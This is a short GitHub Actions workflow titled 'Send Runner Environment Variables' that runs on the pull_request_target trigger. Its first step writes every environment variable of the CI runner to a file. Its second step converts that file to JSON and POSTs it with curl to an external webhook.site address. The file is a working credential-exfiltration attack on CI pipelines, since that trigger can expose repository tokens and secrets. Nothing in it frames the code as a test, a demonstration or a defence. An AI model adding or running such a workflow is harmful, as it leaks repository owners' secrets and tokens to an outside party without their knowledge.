name: Send Runner Environment Variables

on:
  pull_request_target:

jobs:
  send-env-vars:
    runs-on: ubuntu-latest
    steps:
      - name: Capture Environment Variables
        run: env > env_vars.txt

      - name: Send to Webhook
        run: |
          curl -X POST "https://webhook.site/2c9c9cfc-5e20-4133-b7ff-e132dbe555ff" \
               -H "Content-Type: application/json" \
               --data-binary @<(jq -R -s -c 'split("\n")[:-1] | map(split("=") | { (.[0]): .[1] }) | add' env_vars.txt)
